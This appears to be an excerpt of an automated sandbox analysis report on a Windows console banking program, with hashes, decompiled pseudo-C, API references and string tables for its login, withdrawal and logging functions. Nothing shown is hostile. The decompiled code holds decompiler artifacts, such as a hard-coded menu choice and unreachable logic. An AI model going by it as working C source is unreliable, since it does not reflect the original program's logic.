Opcode Fuzzy Hash: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
Instruction Fuzzy Hash: A0E09A36264608AFCB00CBA9DC81D15B3E8EB0C320B1102A5FC25C73A1E638EE008A65

Uniqueness

Uniqueness Score: -1.00%

Function 0046F68E, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104314311.000000000046D000.00000040.00000001.sdmp, Offset: 0046D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: 4f5754c927916335d4623945996045f1d267abe21704a4d018ec4c3c1f2a6635
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: F4E04F372205149BC721AA5AE800C97F7E9EB887B17054436ED8997720E234FC25DB95

Uniqueness

Uniqueness Score: -1.00%

Function 012B6A00, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B6A00() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x012b6a17

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 0046EDE2, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104314311.000000000046D000.00000040.00000001.sdmp, Offset: 0046D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: 4ea0ad4da93230ed52a72c0da0232708cfd32f17affb2eaaa3d2dff180343fad
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: 8FB092A46114804AEB12C3288415B027AE1A740B01F8988E0B00582982D25C8988A200

Uniqueness

Uniqueness Score: -1.00%

Function 0046F6F1, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104314311.000000000046D000.00000040.00000001.sdmp, Offset: 0046D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 0046F839, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104314311.000000000046D000.00000040.00000001.sdmp, Offset: 0046D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04

Uniqueness

Uniqueness Score: -1.00%

Function 012B3610, Relevance: 91.3, APIs: 27, Strings: 25, Instructions: 313
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E012B3610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				void* __ebp;
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t61;
				void* _t98;
				void* _t99;
				void* _t108;
				intOrPtr _t111;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t139;
				void* _t148;

				_t148 = __fp0;
				_t122 = __esi;
				_t121 = __edi;
				_t108 = __ebx;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E012B1380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
					E012B12B0(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E012B715C(_t108, _t121, _t122, 0);
					E012B12B0(0x17, 0xa);
					_push("Enter User name : ");
					E012B715C(_t108, _t121, _t122, 0);
					E012B738B("%s", 0x12d2ee4);
					E012B12B0(0x17, 0xc);
					_push("Password        : ");
					E012B715C(_t108, _t121, _t122, 0);
					_t127 = _t123 + 0x14;
					E012B12F0(_t121, _t122,  &_v68);
					_v20 = _v20 + 1;
					_t143 = _v20 - 3;
					if(_v20 == 3) {
						E012B20E0( &_v68, _t121, _t122, _t143, _t148);
						E012B12B0(0x19, 0xa);
						_push(0x12cfb98);
						E012B715C(_t108, _t121, _t122, _t143);
						E012B12B0(0x16, 0xc);
						_push("Press ENTER to exit the program...");
						E012B715C(_t108, _t121, _t122, _t143);
						_t127 = _t127 + 8;
						E012B77B1(0);
					}
					_v12 = 0;
					_t58 = E012B6EF1("USER.DAT", "r");
					_t128 = _t127 + 8;
					 *0x12d2f28 = _t58;
					while(1) {
						_push( &_v156);
						_push( &_v124);
						_t60 =  *0x12d2f28; // 0x0
						_t61 = E012B7021(_t60, "%s %s %s\n",  &_v92);
						_t129 = _t128 + 0x14;
						if(_t61 == 0xffffffff) {
							break;
						}
						_t98 = E012B8230(0x12d2ee4,  &_v124);
						_t128 = _t129 + 8;
						if(_t98 == 0) {
							_t99 = E012B8230(0x12d2f02,  &_v156);
							_t128 = _t128 + 8;
							if(_t99 == 0) {
								_v12 = _v12 + 1;
							}
						}
					}
					_t111 =  *0x12d2f28; // 0x0
					_push(_t111);
					E012B6DB6(_t108, _t121, _t122, __eflags);
					_t130 = _t129 + 4;
					E012B20E0(_t111, _t121, _t122, __eflags, _t148);
					__eflags = _v12;
					if(__eflags == 0) {
						goto L10;
					}
					break;
					L10:
					E012B12B0(0xa, 0xa);
					_push(0x12cfbf8);
					E012B715C(_t108, _t121, _t122, __eflags);
					_t123 = _t130 + 4;
					__eflags = 1;
				} while (1 != 0);
				E012B8417(__eflags,  &_v80);
				_t131 = _t130 + 4;
				E012B3AB0(_t108, _t121, _t122, _t148);
				do {
					E012B20E0(_t111, _t121, _t122, __eflags, _t148);
					E012B12B0(0xf, 8);
					_push("1. Create New Account\n");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xa);
					_push("2. Cash Deposit");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xc);
					_push("3. Cash Withdrawl");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xe);
					_push("4. Fund Transfer");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0x10);
					_push("5. Account information");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 8);
					_push("6. Transaction information");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 0xa);
					_push("7. Log out");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 0xc);
					_push("8. Exit");
					E012B715C(_t108, _t121, _t122, __eflags);
					_t139 = _t131 + 0x20;
					E012B12B0(1, 0x11);
					_v24 = 0;
					while(1) {
						__eflags = _v24 - 0x4e;
						if(__eflags >= 0) {
							break;
						}
						_push("_");
						E012B715C(_t108, _t121, _t122, __eflags);
						_t139 = _t139 + 4;
						_t111 = _v24 + 1;
						__eflags = _t111;
						_v24 = _t111;
					}
					E012B12B0(0x17, 0x13);
					_push("Press a choice between the range [1-8] ");
					E012B715C(_t108, _t121, _t122, __eflags);
					_t131 = _t139 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					__eflags = _v16 - 7;
					if(__eflags > 0) {
						E012B20E0(_t111, _t121, _t122, __eflags, _t148);
						E012B12B0(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 8!");
						E012B715C(_t108, _t121, _t122, __eflags);
						E012B12B0(0xf, 0xc);
						_push("Press any key to return to main menu...");
						E012B715C(_t108, _t121, _t122, __eflags);
						_t131 = _t131 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M012B3A88))) {
							case 0:
								E012B3DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
								goto L35;
							case 1:
								__eax = E012B4640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 2:
								__eax = E012B49E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 3:
								__eax = E012B4E90(__ebx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 4:
								__eax = E012B5600(__ebx, __ecx, __eflags, __fp0);
								goto L35;
							case 5:
								__eax = E012B6190(__ebx, __ecx, __edx, __fp0);
								goto L35;
							case 6:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0) = E012B12B0(0xf, 0xa);
								_push("Are you sure you want to Log out? <Y/N> : ");
								__eax = E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__ecx = _v5;
								__eflags = __ecx - 0x59;
								if(__eflags == 0) {
									L28:
									_t40 =  &_v36; // -15
									_t40 = E012B8417(__eflags, _t40);
									 *0x12d2f28 = E012B6EF1("LOG.DAT", "a");
									_t41 =  &_v36; // -15
									__ecx = _t41;
									_push(_t41);
									_t42 =  &_v80; // -59
									__edx = _t42;
									_push(_t42);
									_push(0x12d2f40);
									_push(0x12d2ee0);
									_push("%s %s %s %s\n");
									__eax =  *0x12d2f28; // 0x0
									_push(__eax);
									__eax = E012B6F06(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__ecx =  *0x12d2f28; // 0x0
									_push(__ecx);
									__eax = E012B6DB6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E012B3610(__ebx, __edi, __esi, __fp0);
								} else {
									__edx = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0) = E012B12B0(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								__eax = E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(__eflags == 0) {
									L32:
									_t45 =  &_v36; // -15
									__ecx = _t45;
									__eax = E012B8417(__eflags, _t45);
									 *0x12d2f28 = E012B6EF1("LOG.DAT", "a");
									_t46 =  &_v36; // -15
									__edx = _t46;
									_push(_t46);
									_t47 =  &_v80; // -59
									__eax = _t47;
									_push(_t47);
									_push(0x12d2f40);
									_push(0x12d2ee0);
									_push("%s %s %s %s\n");
									__ecx =  *0x12d2f28; // 0x0
									_push(__ecx);
									__eax = E012B6F06(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__edx =  *0x12d2f28; // 0x0
									_push(__edx);
									__eax = E012B6DB6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E012B77B1(0);
								} else {
									__eax = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
					__eflags = 1;
				} while (1 != 0);
				return 1;
			}

0x012b3610
0x012b3610
0x012b3610
0x012b3610
0x012b3619
0x012b361f
0x012b3622
0x012b3625
0x012b3628
0x012b362b
0x012b362e
0x012b3631
0x012b3634
0x012b3637
0x012b363e
0x012b3645
0x012b364c
0x012b3654
0x012b365d
0x012b3662
0x012b3667
0x012b3673
0x012b3678
0x012b367d
0x012b368f
0x012b369b
0x012b36a0
0x012b36a5
0x012b36aa
0x012b36b1
0x012b36bc
0x012b36bf
0x012b36c3
0x012b36c5
0x012b36ce
0x012b36d3
0x012b36d8
0x012b36e4
0x012b36e9
0x012b36ee
0x012b36f3
0x012b36f8
0x012b36f8
0x012b36fd
0x012b370e
0x012b3713
0x012b3716
0x012b371b
0x012b3721
0x012b3725
0x012b372f
0x012b3735
0x012b373a
0x012b3740
0x00000000
0x00000000
0x012b374b
0x012b3750
0x012b3755
0x012b3763
0x012b3768
0x012b376d
0x012b3775
0x012b3775
0x012b376d
0x012b3778
0x012b377a
0x012b3780
0x012b3781
0x012b3786
0x012b3789
0x012b378e
0x012b3792
0x00000000
0x00000000
0x00000000
0x012b3794
0x012b3798
0x012b379d
0x012b37a2
0x012b37a7
0x012b37b3
0x012b37b3
0x012b37bf
0x012b37c4
0x012b37c7
0x012b37cc
0x012b37cc
0x012b37d5
0x012b37da
0x012b37df
0x012b37eb
0x012b37f0
0x012b37f5
0x012b3801
0x012b3806
0x012b380b
0x012b3817
0x012b381c
0x012b3821
0x012b382d
0x012b3832
0x012b3837
0x012b3843
0x012b3848
0x012b384d
0x012b3859
0x012b385e
0x012b3863
0x012b386f
0x012b3874
0x012b3879
0x012b387e
0x012b3885
0x012b388a
0x012b389c
0x012b389c
0x012b38a0
0x00000000
0x00000000
0x012b38a2
0x012b38a7
0x012b38ac
0x012b3896
0x012b3896
0x012b3899
0x012b3899
0x012b38b5
0x012b38ba
0x012b38bf
0x012b38c4
0x012b38c7
0x012b38d4
0x012b38d7
0x012b38db
0x012b3a43
0x012b3a4c
0x012b3a51
0x012b3a56
0x012b3a62
0x012b3a67
0x012b3a6c
0x012b3a71
0x012b38e1
0x012b38e4
0x00000000
0x012b38eb
0x00000000
0x00000000
0x012b38f5
0x00000000
0x00000000
0x012b38ff
0x00000000
0x00000000
0x012b3909
0x00000000
0x00000000
0x012b3913
0x00000000
0x00000000
0x012b391d
0x00000000
0x00000000
0x012b3930
0x012b3935
0x012b393a
0x012b393f
0x012b3942
0x012b3946
0x012b3949
0x012b3954
0x012b3954
0x012b3958
0x012b3972
0x012b3977
0x012b3977
0x012b397a
0x012b397b
0x012b397b
0x012b397e
0x012b397f
0x012b3984
0x012b3989
0x012b398e
0x012b3993
0x012b3994
0x012b3999
0x012b399c
0x012b39a2
0x012b39a3
0x012b39a8
0x012b39ab
0x012b394b
0x012b394b
0x012b394f
0x012b3952
0x00000000
0x00000000
0x012b3952
0x00000000
0x00000000
0x012b39be
0x012b39c3
0x012b39c8
0x012b39cd
0x012b39d0
0x012b39d4
0x012b39d7
0x012b39e2
0x012b39e2
0x012b39e2
0x012b39e6
0x012b3a00
0x012b3a05
0x012b3a05
0x012b3a08
0x012b3a09
0x012b3a09
0x012b3a0c
0x012b3a0d
0x012b3a12
0x012b3a17
0x012b3a1c
0x012b3a22
0x012b3a23
0x012b3a28
0x012b3a2b
0x012b3a31
0x012b3a32
0x012b3a37
0x012b3a3c
0x012b39d9
0x012b39d9
0x012b39dd
0x012b39e0
0x00000000
0x00000000
0x012b39e0
0x00000000
0x00000000
0x012b38e4
0x012b3a74
0x012b3a79
0x012b3a79
0x012b3a84

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B3667
_wprintf.LIBCMT ref: 012B367D

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wscanf.LIBCMT ref: 012B368F

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B36A5

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

_wprintf.LIBCMT ref: 012B36D8
_wprintf.LIBCMT ref: 012B3863
_wprintf.LIBCMT ref: 012B3879
_wprintf.LIBCMT ref: 012B38A7

Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E21
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E54
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E6C
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3E80
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3E94
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3EAA
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3EBB
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3ED1
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3EE2

_wprintf.LIBCMT ref: 012B38BF
_wprintf.LIBCMT ref: 012B36EE

Part of subcall function 012B77B1: _doexit.LIBCMT ref: 012B77BB

_swscanf.LIBCMT ref: 012B3735
_wprintf.LIBCMT ref: 012B37A2
__wstrtime.LIBCMT ref: 012B37BF
_wprintf.LIBCMT ref: 012B37DF
_wprintf.LIBCMT ref: 012B37F5
_wprintf.LIBCMT ref: 012B380B
_wprintf.LIBCMT ref: 012B3821
_wprintf.LIBCMT ref: 012B3837
_wprintf.LIBCMT ref: 012B384D

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Strings

LOG.DAT, xrefs: 012B39F3
USER.DAT, xrefs: 012B3709
0, xrefs: 012B38C7
6. Transaction information, xrefs: 012B3848
Press any key to return to main menu..., xrefs: 012B3A67
8. Exit, xrefs: 012B3874
LOG.DAT, xrefs: 012B3965
5. Account information, xrefs: 012B3832
Enter User name : , xrefs: 012B3678
4. Fund Transfer, xrefs: 012B381C
2. Cash Deposit, xrefs: 012B37F0
Only THREE attempts shall be allowed to enter username and password., xrefs: 012B3662
%s %s %s, xrefs: 012B372A
3. Cash Withdrawl, xrefs: 012B3806
Your input is out of range! Enter a choice between 1 to 8!, xrefs: 012B3A51
%s %s %s %s, xrefs: 012B3A17
%s %s %s %s, xrefs: 012B3989
Are you sure you want to Log out? <Y/N> : , xrefs: 012B3935
N, xrefs: 012B389C
7. Log out, xrefs: 012B385E
Press a choice between the range [1-8] , xrefs: 012B38BA
Password : , xrefs: 012B36A0
1. Create New Account, xrefs: 012B37DA
Are you sure you want to exit? <Y/N> : , xrefs: 012B39C3
Press ENTER to exit the program..., xrefs: 012B36E9

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
API String ID: 1611355571-1720101819
Opcode ID: 5c6bb224be2e171e795f2c766a7dc88186fb2b1179dff10844c2d1062d86d202
Instruction ID: e29cc4c405fec96e497e50d75119aa70789d78a999ba5c9b79c5ed52269d5d38
Opcode Fuzzy Hash: 5c6bb224be2e171e795f2c766a7dc88186fb2b1179dff10844c2d1062d86d202
Instruction Fuzzy Hash: C8A1A2F1EB0207AAE714FBE09CD3BFE76216F61BC0F004629E605752C1EAB162184767

Uniqueness

Uniqueness Score: -1.00%

Function 012B49E0, Relevance: 65.1, APIs: 17, Strings: 20, Instructions: 328
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E012B49E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v376;
				char _v456;
				void* __ebp;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t75;
				void* _t76;
				intOrPtr _t77;
				void* _t81;
				char _t97;
				intOrPtr _t99;
				void* _t104;
				intOrPtr _t105;
				intOrPtr _t110;
				void* _t117;
				void* _t122;
				void* _t127;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t168;
				intOrPtr _t173;
				void* _t177;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t193;
				void* _t195;
				void* _t196;
				void* _t205;

				_t215 = __fp0;
				_t176 = __esi;
				_t175 = __edi;
				_t132 = __ecx;
				_t131 = __ebx;
				_v16 = 0;
				E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
				E012B12B0(5, 0xa);
				_push("Withdraw from A/C number          : ");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B738B("%s",  &_v28);
				_t64 = E012B6EF1("ACCOUNT.DAT", "r");
				_t180 = _t177 + 0x14;
				 *0x12d2f28 = _t64;
				_t214 = _v16;
				if(_v16 == 0) {
					E012B20E0(_t132, __edi, __esi, _t214, __fp0);
					E012B12B0(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E012B715C(__ebx, _t175, _t176, _t214);
				}
				E012B12B0(0x32, 0xa);
				_push( &_v376);
				_push("[ %s ]");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B12B0(5, 0xc);
				_push("Amount to be Withdrawn (in NRs.)  : ");
				E012B715C(__ebx, _t175, _t176, __eflags);
				E012B738B("%f",  &_v12);
				_t70 = E012B6EF1("ACCOUNT.DAT", "r");
				_t184 = _t180 + 0x1c;
				 *0x12d2f28 = _t70;
				_v16 = 0;
				while(1) {
					_push( &_v32);
					_push( &_v36);
					_push( &_v40);
					_push( &_v42);
					_push( &_v140);
					_push( &_v113);
					_push( &_v62);
					_push( &_v112);
					_push( &_v125);
					_push( &_v170);
					_push( &_v200);
					_t75 =  *0x12d2f28; // 0x0
					_t76 = E012B7021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
					_t185 = _t184 + 0x38;
					__eflags = _t76 - 0xffffffff;
					if(__eflags == 0) {
						break;
					}
					_t122 = E012B8230( &_v208,  &_v28);
					_t184 = _t185 + 8;
					__eflags = _t122;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0x8]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E012B20E0( &_v28, _t175, _t176, __eflags, _t215);
							E012B12B0(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							_push("Sorry, the current balance is Rs. %.2f only!");
							E012B715C(_t131, _t175, _t176, __eflags);
							E012B12B0(0x19, 0xe);
							_push("Transaction NOT completed!");
							_t127 = E012B715C(_t131, _t175, _t176, __eflags);
							_v16 = 1;
							return _t127;
						}
					}
				}
				_t77 =  *0x12d2f28; // 0x0
				_push(_t77);
				E012B6DB6(_t131, _t175, _t176, __eflags);
				E012B20E0( &_v200, _t175, _t176, __eflags, _t215);
				E012B12B0(0x1e, 0xa);
				_push("Confirm Transaction");
				_t81 = E012B715C(_t131, _t175, _t176, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E012B1870(_t81,  &_v244);
				E012B12B0(3, 0xc);
				_push( &_v376);
				_push( &_v28);
				E012B715C(_t131, _t175, _t176, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E012B1B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
				E012B8140( &_v324,  &_v456);
				E012B8140( &_v324, "]");
				E012B12B0(0x28 - (E012B82C0( &_v324) >> 1), 0xe);
				_push( &_v324);
				E012B7229(_t131, _t175, _t176, __eflags);
				E012B12B0(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E012B715C(_t131, _t175, _t176, __eflags);
				_t193 = _t185 + 0x14 - 8 + 0x1c;
				_t97 = _v5;
				__eflags = _t97 - 0x59;
				if(_t97 == 0x59) {
					L10:
					 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
					_t99 = E012B6EF1("TEMP.DAT", "w");
					_t195 = _t193 + 0x10;
					 *0x12d2f24 = _t99;
					_v16 = 0;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t168 =  *0x12d2f28; // 0x0
						_t104 = E012B7021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t196 = _t195 + 0x38;
						__eflags = _t104 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t117 = E012B8230( &_v208,  &_v28);
						_t205 = _t196 + 8;
						__eflags = _t117;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0x12c8210]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0x12c8210]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t173 =  *0x12d2f24; // 0x0
						_push(_t173);
						E012B6F06(_t131, _t175, _t176, __eflags);
						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
					}
					_t105 =  *0x12d2f24; // 0x0
					_push(_t105);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					_t147 =  *0x12d2f28; // 0x0
					_push(_t147);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					 *0x12d2f28 = E012B6EF1("TRANSACTION.DAT", "a");
					E012B8417(__eflags, 0x12d2f30);
					_push(0x12d2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x12d2f30);
					_push(0x12d2f40);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t110 =  *0x12d2f28; // 0x0
					_push(_t110);
